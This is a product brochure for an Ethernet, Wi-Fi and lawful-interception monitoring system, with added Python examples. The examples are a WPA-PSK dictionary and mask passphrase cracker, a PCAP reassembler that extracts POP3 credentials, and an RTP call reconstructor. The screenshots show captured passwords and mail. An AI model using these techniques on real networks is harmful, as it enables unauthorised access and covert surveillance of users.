E-Detective System:
* Ethernet LAN Internet Monitoring System, Internet Auditing, Data Leakage Detection and Retention (DLDR), Record Keeping
* Also used by Law Enforcement Agencies for Lawful Interception, implemented at ISP networks and International Gateways


E-Detective Data Guard System:
* Monitor transactions of heterogeneous databases (MySQL, MS SQL, Oracle DB, DB2, Sybase, ...)
* Monitor Windows CIFS activities (MS file sharing activities)
* Monitor internal mail servers, sent and received (POP3, SMTP, ...)


E-Detective Data Retention & Management System:
* Archived backup data from E-Detective Systems
* Review, search and query backup data


Decision Group

* Intercepting Ethernet LAN HTTPS traffic, including HTTPS usernames and passwords
* Also used by Law Enforcement Agencies, implemented at ISP networks

* Archived backup data from E-Detective Systems
* Review, search and query backup data

Central Management Server (CMS):
* Manage multiple E-Detective Systems, ED Backup Servers and EDDC with a single login
* Centralized search/query across the managed systems


Wi-Fi IEEE 802.11 a/b/g/n passive interception:
* Target can be an AP, a client or an entire channel
* Capable of decrypting WEP keys
* WPA-PSK password recovery:
  - using GPU hardware acceleration
  - using a smart dictionary (mutation)
  - using masking (targeted brute force)


Ethernet LAN passive and active interception system:
* Wi-Fi IEEE 802.11 a/b/g/n passive and active interception
* For Wi-Fi passive interception, targets can be up to 4 clients or 4 channels
* Capable of decrypting WEP keys (WEP's RC4 keystream reuse makes key recovery from captured traffic practical)
* WPA-PSK password recovery (optional) using the Password Recovery System
* Decrypting HTTPS traffic, including usernames and passwords, by active implementation in both LAN and Wi-Fi. Active HTTPS interception works by interposing on the TLS session and presenting the client a certificate the interceptor controls, so it only succeeds where the client accepts that certificate (for example a CA pushed to managed endpoints); clients that pin or otherwise validate the expected certificate refuse the connection.
* Capable of manually reconstructing PCAP raw data
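The GPU, smart-dictionary and mask options listed above all do the same work: derive a candidate pairwise master key (PMK) per passphrase and compare it with what the captured handshake implies. The Python below is an added example written for this page, not Decision Group's Password Recovery System. It uses the IEEE 802.11i test vector (passphrase "password", SSID "IEEE") as the target in place of the 4-way-handshake MIC check a real recovery performs, which is omitted; the mutation rules, the mask syntax and the three-word wordlist are the author's own assumptions.

```python
"""WPA-PSK candidate search: dictionary with mutations, and a hashcat-style mask, against a PBKDF2 target."""
import hashlib
import itertools
import string

# IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE". It stands in here for the PMK an
# attacker would otherwise have to confirm against a captured 4-way handshake (that check is omitted).
TEST_VECTOR_PMK = bytes.fromhex("f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")

MASK_SETS = {"?l": string.ascii_lowercase, "?u": string.ascii_uppercase, "?d": string.digits}


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes), as WPA-PSK specifies.
    These 4096 iterations are the entire cost of the search; GPU acceleration parallelises this step."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32)


def mutate(word: str):
    """Smart-dictionary mutations (assumed rule set): word, case variants, common suffixes, leet-speak."""
    yield word
    yield word.capitalize()
    yield word.upper()
    for suffix in ("1", "123", "!", "2024"):
        yield word + suffix
    leet = word.translate(str.maketrans("aeios", "43105"))
    if leet != word:
        yield leet


def mask_candidates(mask: str):
    """Expand a mask such as 'passwo?l?l': ?l/?u/?d are character classes, anything else is literal."""
    positions, i = [], 0
    while i < len(mask):
        if mask[i:i + 2] in MASK_SETS:
            positions.append(MASK_SETS[mask[i:i + 2]])
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    for combo in itertools.product(*positions):
        yield "".join(combo)


def recover(target_pmk: bytes, ssid: str, candidates):
    """Return (passphrase, tries) for the first candidate whose PMK matches, else (None, tries).
    Candidates outside the 8..63 length rule are rejected before the expensive derivation."""
    tries = 0
    for cand in candidates:
        if not 8 <= len(cand) <= 63:
            continue
        tries += 1
        if derive_pmk(cand, ssid) == target_pmk:
            return cand, tries
    return None, tries


def dictionary_attack(target_pmk: bytes, ssid: str, wordlist):
    return recover(target_pmk, ssid, (m for w in wordlist for m in mutate(w)))


def mask_attack(target_pmk: bytes, ssid: str, mask: str):
    return recover(target_pmk, ssid, mask_candidates(mask))


if __name__ == "__main__":
    wordlist = ["letmein", "welcome", "password"]  # constructed three-word dictionary
    print("dictionary:", dictionary_attack(TEST_VECTOR_PMK, "IEEE", wordlist))
    print("mask      :", mask_attack(TEST_VECTOR_PMK, "IEEE", "passwo?l?l"))
```

The length filter matters in practice: seven-character dictionary words such as "letmein" can never be a WPA passphrase, so only their suffixed mutations cost a PBKDF2 run. The mask form is what "targeted brute force" means: the fixed prefix reduces 26^8 candidates to 26^2, which is why an attacker who knows part of the passphrase finishes in seconds while a full keyspace search does not.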




Decision Group Product & Solutions
Offline Manual Packet Reconstruction Series

E-Detective Decoding Centre - EDDC:
* Provides case and user management for different investigators and different cases
* Parse and reconstruct pre-captured PCAP raw data files

Forensics Investigation Toolkit (FIT):
* The only Windows-based software application in the series
* Designed for single-user usage
* Parse and reconstruct PCAP raw data files manually
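What "parse and reconstruct a PCAP raw data file" involves in practice, as an added example that is not the EDDC or FIT code: the classic pcap container is walked record by record, each Ethernet/IPv4/TCP frame is decoded, every TCP direction is reassembled by sequence number, and protocol decoders (here POP3) run over the reassembled bytes. Flows on ports no decoder claims are tabulated as UNKNOWN, the same distinction the Unknown Traffic view later in this deck makes. The capture is constructed inside the block; the addresses, ports and port-to-protocol table are assumptions.

```python
"""Offline PCAP reconstruction: parse Ethernet/IPv4/TCP, reassemble each TCP direction by sequence
number, pull POP3 credentials out of the reassembled stream and tabulate unrecognised flows."""
import struct
from collections import defaultdict

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1
KNOWN_PORTS = {21: "FTP", 23: "TELNET", 25: "SMTP", 80: "HTTP", 110: "POP3", 143: "IMAP", 443: "HTTPS"}

def pcap_records(data: bytes):
    """Yield (timestamp, frame) from a classic pcap; the magic number fixes the byte order."""
    end = "<" if struct.unpack("<I", data[:4])[0] == PCAP_MAGIC else ">"
    if struct.unpack(end + "I", data[:4])[0] != PCAP_MAGIC:
        raise ValueError("not a classic pcap file")
    if struct.unpack(end + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link-layer captures are handled")
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        yield ts_sec + ts_usec / 1e6, data[off + 16:off + 16 + incl_len]
        off += 16 + incl_len

def parse_tcp(frame: bytes):
    """Return (src, sport, dst, dport, seq, payload) for an IPv4/TCP frame, else None."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl, total_len = (frame[14] & 0x0F) * 4, struct.unpack("!H", frame[16:18])[0]
    src, dst = ".".join(map(str, frame[26:30])), ".".join(map(str, frame[30:34]))
    tcp = frame[14 + ihl:14 + total_len]
    sport, dport, seq = struct.unpack("!HHI", tcp[:8])
    return src, sport, dst, dport, seq, tcp[(tcp[12] >> 4) * 4:]

def reassemble(pcap: bytes) -> dict:
    """Map (src, sport, dst, dport) -> payload stitched in sequence order. Pure retransmissions are
    dropped and overlapping prefixes trimmed; a lost segment simply leaves its bytes missing."""
    segments = defaultdict(list)
    for _ts, frame in pcap_records(pcap):
        parsed = parse_tcp(frame)
        if parsed and parsed[5]:
            segments[parsed[:4]].append((parsed[4], parsed[5]))
    streams = {}
    for key, segs in segments.items():
        segs.sort()
        buf, next_seq = bytearray(), segs[0][0]
        for seq, payload in segs:
            end = seq + len(payload)
            if end <= next_seq:
                continue                                  # already fully appended: retransmission
            buf += payload[max(0, next_seq - seq):]       # trim any overlap with earlier data
            next_seq = end
        streams[key] = bytes(buf)
    return streams

def pop3_logins(streams: dict) -> list:
    """USER/PASS pairs from client->server streams to TCP/110 (POP3 sends them in clear text)."""
    found = []
    for (src, _sport, dst, dport), data in streams.items():
        if dport != 110:
            continue
        creds = {"client": src, "server": dst, "user": None, "password": None}
        for line in data.split(b"\r\n"):
            verb, _, arg = line.partition(b" ")
            if verb.upper() in (b"USER", b"PASS"):
                creds["user" if verb.upper() == b"USER" else "password"] = arg.decode("ascii", "replace")
        if creds["user"] or creds["password"]:
            found.append(creds)
    return found

def flow_table(streams: dict) -> list:
    """One row per direction: endpoints, bytes carried and the protocol label, UNKNOWN if unrecognised."""
    return [(src, sport, dst, dport, len(data), KNOWN_PORTS.get(dport) or KNOWN_PORTS.get(sport, "UNKNOWN"))
            for (src, sport, dst, dport), data in streams.items()]

def build_frame(src, sport, dst, dport, seq, payload):
    """Constructed Ethernet/IPv4/TCP frame (PSH+ACK); checksums left zero, not needed for reconstruction."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split(".")))) + tcp
    return bytes.fromhex("020000000002" "020000000001" "0800") + ip   # assumed MACs, EtherType IPv4

def build_pcap(frames) -> bytes:
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1230768000 + i, 0, len(frame), len(frame)) + frame
    return out

# Constructed capture: a POP3 login delivered out of order with one retransmitted segment, plus a
# flow on a port the decoder does not know (the kind of traffic an Unknown Traffic view reports).
CLIENT, SERVER = "192.168.1.12", "10.0.0.5"
SAMPLE_PCAP = build_pcap([
    build_frame(CLIENT, 51000, SERVER, 110, 5012, b"PASS s3cret\r\n"),
    build_frame(SERVER, 110, CLIENT, 51000, 1000, b"+OK POP3 ready\r\n"),
    build_frame(CLIENT, 51000, SERVER, 110, 5000, b"USER alice\r\n"),
    build_frame(CLIENT, 51000, SERVER, 110, 5000, b"USER alice\r\n"),   # retransmission
    build_frame(CLIENT, 51001, SERVER, 4444, 1, b"hello"),
])

if __name__ == "__main__":
    streams = reassemble(SAMPLE_PCAP)
    for row in flow_table(streams):
        print(row)
    print(pop3_logins(streams))
```

Two things the block deliberately does not do are exactly what a production reconstructor must: it identifies protocols by port only (a decoder that sniffs the payload catches POP3 on a non-standard port), and it ignores 32-bit sequence wraparound and gap handling beyond "data missing", which matters on the long, lossy captures a mirror port produces under load.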




Wireline Ethernet Interception & Real-Time Reconstruction Series


Introduction to E-Detective System

Wireline Ethernet Internet Monitoring, Data and Record Retention & Network Content Forensics Analysis Solution (Real-Time Reconstruction)

Solution for:
* Organization Internet monitoring / network behavior recording
* Auditing and record keeping for the banking and finance industry
* Forensics investigation and regulatory compliance (e.g. SEC, NASD)

E-Detective System Models and Series (appliance based): FX-06 Series, FX-30 Series, FX-100 Series
Users can also opt to purchase a software licence only and use their own hardware/server.


E-Detective System Architecture: (diagram)
E-Detective - Mirror Mode Implementation (1)
Real-Time Reconstruction, organization or corporate network deployment

* Capture - mirror mode: sniffer technology captures Internet traffic/packets through a port-mirroring (SPAN) switch. Mirroring needs to be done on the managed switch, so that the traffic between the users/server farm and the WAN router/firewall is copied to E-Detective's capture port.
* Manage: the management port can be connected to the core switch, allowing the administrator to access the system from a PC on the network.
* Recommended implementation.

(Diagram: WAN router/firewall, server farm, switch/hub, users, another building/department/floor, administrator PC)

Mirror mode is passive, so a capture outage never interrupts user traffic; the trade-off is that a mirror port carries both directions of every mirrored link and silently drops packets once their sum exceeds its own line rate. Keep the capture interface without an IP address and reach the appliance only through the separate management port, so that the box holding reconstructed content is not itself addressable from the monitored segment.


E-Detective - Bridge Mode Implementation (2)
Real-Time Reconstruction

* Bridge mode (inline mode): all Internet traffic passes through E-Detective, which sits between the internal switch and the router/firewall and acts as a gateway to the Internet for the servers and users.
* Implementation for small networks (fewer than 50 online users) which do not have a port-mirror switch.

(Diagram: servers, server farm, router/firewall, administrator, users, another building/department/floor)

Because the appliance is in the traffic path, its failure or reboot cuts Internet access for the whole site unless a fail-open bypass is in place, and its reconstruction throughput becomes the site's ceiling, which is consistent with the small-network recommendation above.


E-Detective Lawful Interception (LI) Solutions - Law Enforcement

Solutions for Lawful Interception - Nation Wide Deployment

(Diagram: at the ISP, core data traffic switches feed an aggregator / distributed taps that distribute traffic to N x E-Detective systems, each behind an IDS/firewall, with NAS/SAN storage at the central site and at other ISP sites/states; a secured private network connects them to the Central Management System, which gives law enforcement access to reporting, intercepted and reconstructed content, search and alert functions.)


Lawful Interception - Mass Interception (1)

* Huge amount of traffic (10 G throughput or more).
* An aggregator and distributed tap / data access switch can be used to filter the captured traffic (10 G or more) by domain/subnet/IP and distribute it to multiple E-Detective systems for real-time reconstruction.
* The maximum reconstruction throughput handled by each E-Detective system is approximately 500 Mbps - 1 Gbps, using hardware with a RAID 0 configuration of 8 x HDD. RAID 0 stripes for throughput only and has no redundancy, so the backup below is what protects captured evidence from a single disk failure.
* A Central Management Server (CMS) is used to manage the N x E-Detective systems scattered over the central location and the site locations.
* Captured data (raw data in PCAP format and reconstructed data) can be backed up to an E-Detective Backup Server System or NAS/SAN at each location.
* The CMS is made securely accessible to law enforcement.


Lawful Interception - Targeted IP

* Smaller amount of traffic (capture and filter traffic by targeted IP address configuration).
* An aggregator and distributed tap / data access switch can be used to filter the captured traffic (10 G or more) by targeted IP addresses before handing the filtered raw data to the E-Detective systems for real-time reconstruction.
* The maximum reconstruction throughput handled by each E-Detective system is approximately 500 Mbps - 1 Gbps using a RAID 0, 8 x HDD configuration. More than one E-Detective system can be deployed to handle a larger traffic throughput.
* A Central Management Server (CMS) is used to manage the N x E-Detective systems scattered over the central location and the site locations.
* Captured data (raw data in PCAP format and reconstructed data) can be backed up to an E-Detective Backup Server System or NAS/SAN at each location.


E-Detective Sample Screenshots - Homepage (Top-Down Drill to Details Reporting)

(Screenshot: the homepage groups reconstructed sessions by service category - Email (POP3, IMAP, SMTP, Webmail read/sent), Chat (MSN, ICQ, Yahoo, QQ, Skype, UT chatroom, Google Talk, IRC chatroom), File Transfer (FTP, P2P), Online Game and HTTP Link - with daily and weekly traffic statistics, throughput reports, an online user list and a per-protocol daily throughput report in KB; drilling into POP3 opens the mail report, whose columns are No., Date-Time, Account, Sender, Receiver, CC, Subject, Size, Similar and Whois, with the message body viewable per row.)


E-Detective Internet Protocols Supported

(Screenshot: Yahoo! Singapore and Gmail sign-in pages, illustrating webmail capture.)
Webmail (Yahoo, Gmail, ...); IM (MSN, ICQ, QQ, IRC); file transfer (FTP, P2P, BitTorrent); online games; Telnet etc.

Sample: Email (POP3, SMTP and IMAP)

(Screenshot: the mail list shows Date-Time, Account, Sender, Receiver, CC, Subject and Size for each reconstructed message; a message opened from the list is rendered as the original e-mail, and the Whois panel resolves the source and destination IPs of the session - hostname query, Whois query and Google Map location - through an external whois service.)

Sample: Web Mail (Read and Sent)

(Screenshot: the webmail list shows Date-Time, Account (client IP), Sender, Password, Receiver, CC, Subject and webmail Type (Gmail, Windows Live, Yahoo Mail); a selected message is reconstructed with From, To, Date/Time, Subject, attachments and body text.)
Webmail types: Yahoo Mail, Gmail, Windows Live Hotmail, Giga Mail and others.


Sample: IM - Yahoo, MSN, ICQ, IRC

(Screenshot: the MSN view lists Date-Time, Account and User Handle per session, with the contact's Friend List (account and nickname), the Participants of each conversation, and the conversation itself as numbered entries of Date-Time, User Handle and Type - Message text, File transfers with file name, Audio and Video sessions with start and finish times; conversations can be searched and exported.)

Sample: File Transfer - FTP Upload/Download

(Screenshot: the FTP list shows Date-Time, Account, Username, Password, Action (Upload/Download), FTP Server IP and File Name; the transferred file, here a PDF datasheet, is stored and can be opened from the record. FTP sends its login in clear text, which is why the Username and Password columns are populated straight from the capture.)

VOIP-DETECTIVE

* Capable of capturing, decoding and reconstructing VoIP RTP sessions.
* Supports SIP and H.323.
* Supported codecs: G.711 A-law, G.711 µ-law, G.729, G.723, G.726 and iLBC.
* Capable of playing back VoIP sessions.


Sample: File Transfer - P2P File

(Screenshot: the P2P list shows Date-Time, Account, client (BitTorrent, LimeWire/4.16.6), file name, send and receive throughput and a Detail link; the detail view for one torrent lists each peer exchange as Date-Time, Action (Upload/Download), peer IP and port.)
Supports P2P such as BitTorrent, eMule/eDonkey, FastTrack and Gnutella.


Sample: File Transfer - Windows File Sharing

(Screenshot: the list shows Date-Time, Account, Username, Action (Download), Server, Path, File Name, Size, Similar and Whois; the reconstructed file, an archive, opens in the archiver.)
Supports Windows file sharing (CIFS) logs and reconstruction. The tapping point must see these data transfers: traffic between two hosts on the same switch never reaches a mirror of the Internet uplink, so the mirror session or tap has to include the file server's own port.


Sample: HTTP (Link, Content and Reconstruction)

(Screenshot: the HTTP link list shows No., Date-Time, Account, Referer count and Content URL for each request - here google.com.sg and facebook.com pages - and the selected page is rebuilt as it appeared to the user.)
HTTP web page reconstruction through proxy service.


Sample: HTTP Web Upload/Download

(Screenshot: the list shows Date-Time, Account, Action (Upload/Download), File Name, URL and Size - torrent files, video clips and images fetched over HTTP, and an image attached through Gmail's upload - and each file can be opened from the record.)


Sample: HTTP Video Streaming (FLV)

(Screenshot: the video stream list shows Date-Time, Account, Host, File Name, URL and Size; a captured clip is played back in the built-in player.)
Video stream (FLV format): YouTube, Google Video, Metacafe.


Sample: HTTP Request (GET & POST)

(Screenshot: the request list shows Date-Time, Account, Action (GET), URL, Similar and Whois for four requests to sg.yahoo.com; selecting a row shows the original request headers as captured.)

GET /s/269375 HTTP/1.1
Accept: */*
Referer: http://sg.yahoo.com/?p=us
Accept-Language: en-sg
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; ...; SLCC1; .NET CLR 2.0...)
Accept-Encoding: gzip, deflate
Host: sg.yahoo.com
Connection: Keep-Alive
Cookie: Y=... (value truncated in the screenshot)


Sample: Telnet Session (with Play Back)

(Screenshot: the Telnet list shows Date-Time, Account, User, Password, Server and the size of the recorded session file; each session can be replayed. Telnet carries the login and the whole session in clear text, so the User and Password columns are filled directly from the capture.)


Sample: VoIP Calls (with Play Back) - Optional

(Screenshot: the VoIP list shows Date-Time, Account (client IP), Caller, Callee, Mode (peer to peer), Type (SIP), Codec (G.723, iLBC, G.729), the reconstructed .wav File Name and the call duration.)
Play back of the reconstructed VoIP audio file using a media player.
Supports SIP/H.323 RTP codecs such as G.711 A-law, G.711 µ-law, G.726, G.729 and iLBC.
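Reconstructing a VoIP session into a playable .wav, as described in the VOIP-Detective section and shown in this VoIP Calls sample, comes down to ordering one SSRC's RTP packets by sequence number, filling lost frames with silence and decoding the codec payload to linear PCM. The Python below is an added example, not the product's decoder; it handles only G.711 µ-law (RTP payload type 0) over a constructed four-frame capture, and the SSRC value, the 20 ms frame size and the packet order are assumptions.

```python
"""Reassemble one G.711 mu-law RTP stream into 16-bit PCM and write it out as a WAV file."""
import io
import struct
import wave

RTP_HEADER_LEN = 12
PT_PCMU = 0            # RTP payload type 0 = G.711 mu-law, 8000 Hz mono
ULAW_SILENCE = 0xFF    # mu-law code for a zero-valued sample


def ulaw_to_linear(u: int) -> int:
    """Decode one G.711 mu-law byte to a signed 16-bit PCM sample (ITU-T G.711 expansion)."""
    u = ~u & 0xFF
    exponent, mantissa = (u >> 4) & 0x07, u & 0x0F
    t = ((mantissa << 3) + 0x84) << exponent
    return (0x84 - t) if u & 0x80 else (t - 0x84)


def parse_rtp(packet: bytes):
    """Return (payload_type, seq, timestamp, ssrc, payload) for an RTP v2 packet (RFC 3550 header)."""
    if len(packet) < RTP_HEADER_LEN:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = struct.unpack("!BBHII", packet[:RTP_HEADER_LEN])
    if b0 >> 6 != 2:
        raise ValueError("not RTP version 2")
    header_len = RTP_HEADER_LEN + 4 * (b0 & 0x0F)           # skip the CSRC list
    if b0 & 0x10:                                            # extension: profile(2) + length in words(2)
        header_len += 4 + 4 * struct.unpack("!H", packet[header_len + 2:header_len + 4])[0]
    payload = packet[header_len:]
    if b0 & 0x20 and payload:                                # padding: last byte is the pad length
        payload = payload[:-payload[-1]]
    return b1 & 0x7F, seq, ts, ssrc, payload


def reassemble_pcmu(packets, samples_per_packet=160):
    """Order one SSRC's PCMU packets by sequence number, fill gaps with silence, decode to PCM.
    Returns (pcm_samples, lost_frames). Duplicates keep the first copy; other SSRCs are ignored."""
    by_seq, stream_ssrc = {}, None
    for pkt in packets:
        pt, seq, _ts, ssrc, payload = parse_rtp(pkt)
        if pt != PT_PCMU:
            continue
        stream_ssrc = stream_ssrc if stream_ssrc is not None else ssrc
        if ssrc == stream_ssrc:
            by_seq.setdefault(seq, payload)
    if not by_seq:
        return [], 0
    pcm, lost = [], 0
    for seq in range(min(by_seq), max(by_seq) + 1):
        payload = by_seq.get(seq)
        if payload is None:
            lost += 1
            payload = bytes([ULAW_SILENCE]) * samples_per_packet
        pcm.extend(ulaw_to_linear(b) for b in payload)
    return pcm, lost


def wav_bytes(pcm, rate=8000) -> bytes:
    """Serialise PCM samples as a mono 16-bit WAV, the form a media player can play back."""
    buf = io.BytesIO()
    with wave.open(buf, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(rate)
        w.writeframes(struct.pack("<%dh" % len(pcm), *pcm))
    return buf.getvalue()


def build_rtp(seq, ts, ssrc, payload, pt=PT_PCMU) -> bytes:
    return struct.pack("!BBHII", 0x80, pt, seq, ts, ssrc) + payload


# Constructed capture (assumed SSRC and 20 ms frames): packets arrive out of order, seq 1 is
# duplicated and seq 3 was lost on the wire.
SSRC = 0x1234ABCD
FRAMES = {0: bytes([0xFF]) * 160, 1: bytes([0x80, 0x00]) * 80, 2: bytes([0x7F]) * 160, 4: bytes([0xFF]) * 160}
SAMPLE_CAPTURE = [build_rtp(s, s * 160, SSRC, FRAMES[s]) for s in (2, 0, 4, 1, 1)]

if __name__ == "__main__":
    samples, lost = reassemble_pcmu(SAMPLE_CAPTURE)
    wav = wav_bytes(samples)
    print(f"{len(samples)} samples ({len(samples) / 8000:.2f} s), {lost} lost frame(s), {len(wav)} WAV bytes")
```

A real call has two RTP streams, one per direction, each with its own SSRC; reassemble each separately and mix or store them as two channels. This block also does not handle the 16-bit sequence number wrapping at 65535, which a call longer than about 20 minutes at 50 packets per second will hit; a production decoder tracks the wrap or orders by the 32-bit timestamp instead.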


Sample: Database Logging

(Screenshot: the SQL list shows Date-Time, Account (client IP), Username, Password, Server, DB Name, Command and DB Type for each statement - here an 'sa' login to an MSSQL server issuing "use de", "set textsize 64512", "Select count(*) From pop3" and "Insert into pop3 (FROM, TO, CC, BCC, SU...)".)
Supports database logging (MySQL, MSSQL, Oracle etc. database commands). Interception points must contain the database command packets. The credentials and statements are readable here because these connections were not encrypted; enabling TLS on the database listener hides both from a tap.


ample: Unknown Traffic Analysis 


No. [Г] Date-Time Src IP Dst IP Src Port Dst Port Src MAC Dst MAC Size Packets Protocol ^ 
= 2003-01-01 
1. 00-20-55 192.168.1.12 192.168.88.5 63578 161 00:1А:80:5С:5В:ПЕ 00:50:7F:29:58:11 120B 4 UDP 
- 2003-01-01 
2: 00:20:55 192.168.1.50 192.168.1.255 138 138 00:16:67:00:3C:56 EEEEEEFETEFE 402B 4 UDP 
2003-01-01 
[Screenshot: Unknown-protocol capture list with columns Date-Time, Source IP, Destination IP, DPORT, MAC, DMAC, Packets, Size (Byte) and Protocol (all rows 192.168.1.12 to 192.168.1.60, port 443, TCP), shown beside the same list exported to Excel as UNKNOWN-20030101.xls (File Download dialog). Total 174, Total Page 9, Current Page 1.]


Turn on the Unknown Capturing Module if necessary. It is off by default.


Admin: System Access Authority Assignment
Authority - Visibility and Operation in Group (with User defin…)

[Screenshot: Authority - Visibility settings: visibility group name, default rules (All non-visual / All visual), per-service exceptions (POP3, SMTP, WEBMAIL-R, MSN, SKYPE, IRC, GOOGLETALK, HTTPPAGE, HTTPFILE, HTTPRECONSTRUCT, FTP, GAME, TELNET), visibility of search functions (RECORD, ACCOUNT, FULLTEXT, DATA, ASSOCIATION), report functions (STATISTICS, SCHEDULE) and system settings (NETWORK, INFORMATION, SERVICE, ACCOUNT, BACKUP, SYSTEM, ONLINE NOTIFICATION), each with Set visibility IP / Account Add / Delete. Authority - Operation settings: operation group name and perform rules (Read only recorded record, Can read recorded content, Can read set content, Can read and write (Delete, setting ...)). User group list: Administrator, Technical, Finance, Logistics, with Add Time and Add User / Delete functions; Total 4, Total Page 1, Current Page 1.]


Export & Backup - Auto (by FTP) and Manual

[Screenshot: Export & Backup page: schedule (Hour / Day / Month / Week), Status Stop / Start, service categories to back up (POP3, SMTP, IMAP, WEBMAIL-R, WEBMAIL-S, MSN, ICQ, YAHOO, QQ, UT, SKYPE, IRC, GOOGLETALK, FTP, P2P, GAME, HTTP-L, HTTP-C, HTTP-D, VIDEO STREAM, TELNET), backup directory list with ISO sizes (e.g. 20081013073401 11M, 20081012204148 46M), an option to delete backed-up recording data older than a set number of days, ISO file / CD-ROM/DVD burner selection, and FTP login information (Ftp Host, User, Password, Port Number, Directory, Backup Record ON / OFF). On-screen notes: "Please ensure you have at least 700 MB free in HD"; "Please use FTP software to download the Backup ISO image! Please use 'admin' as FTP login account."]

* Reserved Raw Data Files and Backup Reconstructed Data
* Manual Backup: Download ISO or Burn in to CD/DVD
* Comes with Hashed Export Function


Alert and Notification - Alert with …

[Screenshot: Alert List with two configured alerts: "POP3 Key Word is CEO, Managing Director, Gen… Fw to: frankie@ed-system.sg" and "SMTP Key Word is Price list.xls" (Total 2). Create a New Alert form: for each service (POP3, IMAP, SMTP, WEBMAIL-R, WEBMAIL-S, MSN, YAHOO, ICQ, QQ, UT, SKYPE, GOOGLETALK, IRC, FTP, P2P, GAME, HTTP-L, HTTP-C, ...) an alert parameter (Sender, Key Word, User Account or IP), a time window (08:00 - 17:00), Allow / Deny, and a Forward-to address.]

Alert configured with different categories and different parameters such as key word. Alert can be sent to Administrator by Email or SMS (if SMS Gateway is available).

Throughput alert function is also available!


Search - Free Text, Condition, …

Complete Search - Free Text Search, Conditional Search, Similar Search and Association Search

[Screenshot: Search All page (https://192.168.10.60/) with Search Parameters (Date, Time, Source IP, Email Address, Subject, Webmail Type, FTP Server, FTP File, P2P File, Game Name, MSN / Yahoo Account with User Handle / Participants), Search Category, History Query, and search by KEYWORD / IP / ACCOUNT; the result list shows captured emails with Date-Time, Account, Sender, Receiver, CC, Subject and Size. Second screenshot: Free Text search results (Time, Category, Briefly, Functions, Association, Account) with Search Account and Association buttons and an IP drill-down (192.168.1.237); Total 563, Total Page 38, Current Page 1.]

Callouts: Conditional Search, Free Text Search, Association Search, Similar Search.


File Checksum (Hash) - Check File …

[Screenshot: captured file list (No., File Name, Extension, Count, Size, Search) with Browse / Upload of a local file (TUT186-Forensics.pdf); after the upload the list is filtered to the matching captured file (TUT186-Forensics.pdf, pdf, 884.64K). Total 5 before, Total 1 after.]

Shows the file list; the user can import files to check and compare them with the files that have been captured by the system.

Compare file content integrity. Abuser might have changed file …


Bookmark Function (for Review & Retrieval Later)

[Screenshot: Bookmark list (Date-Time, Account, Sender, Receiver, CC, Subject, Size, Similar, Whois) with BookMark / Delete / Search / Account List actions, and a bookmark management dialog (Name: decision, singapore; Remove, Export; Export ISO Name). Total 20, Total Page 3, Current Page 1.]

Bookmark items and allow the review of the items. Bookmark items can also be …


Reporting - Network Service Usage - Daily

[Chart: Network Services Usage Report (daily) pie chart: HTTP Link 33,66%, HTTP Content 32,91%, UT 10,6%, MSN 8,63%, HTTP Download 4,06%, QQ 3,2%, other services smaller. Drill-down list of HTTP Link records (Date-Time, Account, HOST, Similar, Whois), e.g. 2009-08-29 22:16:55 account 123 Seednet Webmail, lunko Welcome to ICQ, peter YouTube - Broadcast Yourself; Total 57,795, Total Page 2,890, Current Page 1.]

Drill Down Reporting Capabilities


Reporting - Network Service Usage - Weekly

[Chart: Network Services Usage Weekly Report, 2009/08/23 - 2009/08/29, bar chart of HTTPPAGE counts per day (y-axis 0 - 60,000). Drill-down list of HTTP Content records (Date-Time, Account, Content, Similar, Whois), e.g. 2009-08-29 22:22:41 peter freeworldgroup.com, 123 PChome, peter pagead2.googlesyndication.com / Advertisement; Total 56,971, Total Page 2,849, Current Page 2.]

Drill Down Reporting Capabilities


Reporting - Top Websites Viewed

[Screenshot: Top Web Sites (Weekly / Summary) table of Web Server URL and Count, 18 entries, e.g. mail.pchome.com.tw 3,305, pagead2.googlesyndication.com 1,380, www.google.com.tw 1,362, tw.youtube.com 1,311, www.flickr.com 1,310, www.freeworldgroup.com 828; Top N selection by IP or ACCOUNT; Relationship between Account and IP; User Behavior per IP (e.g. 192.168.1.3 with 9,660 and 192.168.1.10 with 7,075) with Daily Usage / Weekly Usage links.]


Reporting - Online IP - Account Lists

[Screenshot: Online IP List (Visibility Group: ALL) with No., Client Search, Server Search, PC Name, Account, Last Connection Time (e.g. DECISION-CASPER 2011-07-27 15:05:14), and tabs Add/Delete, Set IP, Import/Export IP, Skipped IP List, Search, Account Detection, Mail Report. A Throughput Month Statistical report for 192.168.1.2 (2011-07) lists Quantity and Throughput per service (Total 1751, 148080KB; POP3, IMAP, SMTP, Webmail (Read), Webmail (Sent), MSN, ICQ, YAHOO, QQ, SKYPE, UT Chatroom, GOOGLETALK, IRC Chatroom, almost all 0 KB).]


Reports - Daily Excel Log Report

